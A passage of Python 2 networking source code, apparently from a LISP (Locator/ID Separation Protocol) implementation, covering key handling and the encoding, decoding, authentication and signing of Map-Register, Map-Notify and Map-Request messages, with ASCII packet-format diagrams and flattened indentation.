hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
hash_output = hexlify(hash_output)
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (by_rlocs.has_key(addr_str) == False):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in cipher suite value. Support 1024-bit keys only. Then insert
# key-length and public key material. Do not negotiate ECDH 25519
# cipher suite if library not installed on system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
        # is enough packet to pull the key out according to the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
        # Iterate to pull 8 bytes (64 bits) out at a time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = ""
for i in range(0, len(key), 2):
new_key += chr(int(key[i:i+2], 16))
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread():
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = Queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header():
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid is one of 8 values that describes the encryption key-id used for
# encrypting Map-Register messages. When the Map-Register is encrypted, the
# entire message, not including the first 4 bytes, is chacha20 encrypted. The
# e-bit must be set by the ETR to indicate that the Map-Register was encrypted.
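# Per encode()/decode() below, the e-bit is bit 0x2000 of the first long and
# the kid field occupies the three bits directly above it, i.e.,
# (first_long >> 14) & 0x7.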
#
class lisp_map_register():
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.record_count = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
        # Append zeroed authentication data so we can compute the hash later.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = ""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce = byte_swap_64(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
if (len(packet) < format_size): return([None, None])
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
#
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify():
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
def zero_auth(self, packet):
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as a LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig"> }.
#
# Generating private/public key-pairs. Note that the code below parses keys
# with the python ecdsa module, which expects EC (not RSA) keys, so generate
# an EC key-pair, for example:
#
#  openssl ecparam -name prime256v1 -genkey -noout -out privkey.pem
#  openssl ec -in privkey.pem -pubout -out pubkey.pem
#
# And use ecdsa.SigningKey.from_pem()/ecdsa.VerifyingKey.from_pem() after
# reading in file.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
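#
# For illustration only (hypothetical values), the JSON string carried in the
# Source-EID LCAF of a signed Map-Request looks like:
#
#   { "source-eid" : "2001:db8:1::1", "signature-eid" : "2001:db8:2::1",
#     "signature" : "<base64-encoded-ecdsa-signature>" }
#
# where the signed data is the concatenation of the nonce (as a hex string),
# the source-EID string, and the target-EID string (see sign_map_request()
# below).
#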
class lisp_map_request():
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
self.json_telemetry = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
if (itr.afi == LISP_AFI_LCAF and self.json_telemetry != None):
continue
#endif
itr_str = red(itr.print_address_no_iid(), False)
lprint(" itr-rloc: afi {} {}{}".format(itr.afi, itr_str,
"" if (keys == None) else ", " + keys[1].print_keys()))
keys = None
#endfor
if (self.json_telemetry != None):
lprint(" itr-rloc: afi {} telemetry: {}".format(LISP_AFI_LCAF,
self.json_telemetry))
#endif
#enddef
def sign_map_request(self, privkey):
sig_eid = self.signature_eid.print_address()
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
self.map_request_signature = privkey.sign(sig_data)
sig = binascii.b2a_base64(self.map_request_signature)
sig = { "source-eid" : source_eid, "signature-eid" : sig_eid,
"signature" : sig }
return(json.dumps(sig))
#enddef
def verify_map_request_sig(self, pubkey):
sseid = green(self.signature_eid.print_address(), False)
if (pubkey == None):
lprint("Public-key not found for signature-EID {}".format(sseid))
return(False)
#endif
source_eid = self.source_eid.print_address()
target_eid = self.target_eid.print_address()
sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
pubkey = binascii.a2b_base64(pubkey)
good = True
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
lprint("Invalid public-key in mapping system for sig-eid {}". \
format(self.signature_eid.print_address_no_iid()))
good = False
#endtry
if (good):
try:
good = key.verify(self.map_request_signature, sig_data)
except:
good = False
#endtry
#endif
passfail = bold("passed" if good else "failed", False)
lprint("Signature verification {} for EID {}".format(passfail, sseid))
return(good)
#enddef
def encode_json(self, json_string):
lcaf_type = LISP_LCAF_JSON_TYPE
